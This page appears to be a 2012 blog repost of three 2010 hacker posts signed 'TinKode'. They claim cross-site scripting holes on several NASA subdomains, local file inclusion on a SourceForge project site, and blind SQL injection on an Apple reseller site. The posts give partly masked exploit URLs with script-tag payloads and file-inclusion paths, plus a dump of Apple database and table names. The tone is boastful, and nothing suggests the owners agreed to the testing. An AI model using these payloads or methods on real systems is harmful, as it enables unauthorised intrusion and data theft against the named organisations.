Sunday, February 5, 2012

TinKode-How to find XSS in NASA

9:29 PM  Admin  1 comment


How to find XSS in NASA

Posted by isrtinkode on February 16, 2010
__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\
#How to find XSS in NASA?
Verry simple. What you have to do, is only to type on google, inurl:”tinkode”, and that it’s all.
Link google:
http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=*********&start=40&sa=N
Link Nasa XSS:
http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%*********TinKode/%29%3C/script%3E
Yeah, this XSS is indexed on google, LOL.
Another XSS in NASA:
1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3*********/script%3E
2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3C*********%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%*********/c0de.breaker/)%3C/script%3E
4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=*********)%3C/script%3E
5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=*********)%3C/script%3E
6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=*********)%3C/script%3E
etc

Read More

TinKode-SourceForge LFI

9:12 PM  Admin  No comments


SourceForge LFI

Posted by isrtinkode on February 18, 2010
 ____                            __
/ ___|  ___  _   _ _ __ ___ ___ / _| ___  _ __ __ _  ___
\___ \ / _ \| | | | '__/ __/ _ \ |_ / _ \| '__/ _` |/ _ \
 ___) | (_) | |_| | | | (_|  __/  _| (_) | | | (_| |  __/
|____/ \___/ \__,_|_|  \___\___|_|  \___/|_|  \__, |\___|
                                              |___/
Link: Sourceforge.net
Yeah, it’s vulnerable to LFI (Local File Inclusion).
http://in-dtsc.sourceforge.net/index.php?content=**********
http://in-dtsc.sourceforge.net/index.php?content=*******/conf/htt***.conf
For more informations read a tutorial about LFI.

Read More

TinKode-APPLE Vulnerable to Blind SQLi

9:06 PM  Admin  No comments


APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010
          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode
@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.
Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.
Testing:


Now let’s see the version
#Version: 5
#Databases: locator_asiatest
#Tables from “locator_asia” database
[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log
#Tables from “test” database
[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp
Columns from “reseller_city_utf8” table
[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4
A good thing is that there is nothing important to extract…
Great, good bye, TinKode

Read More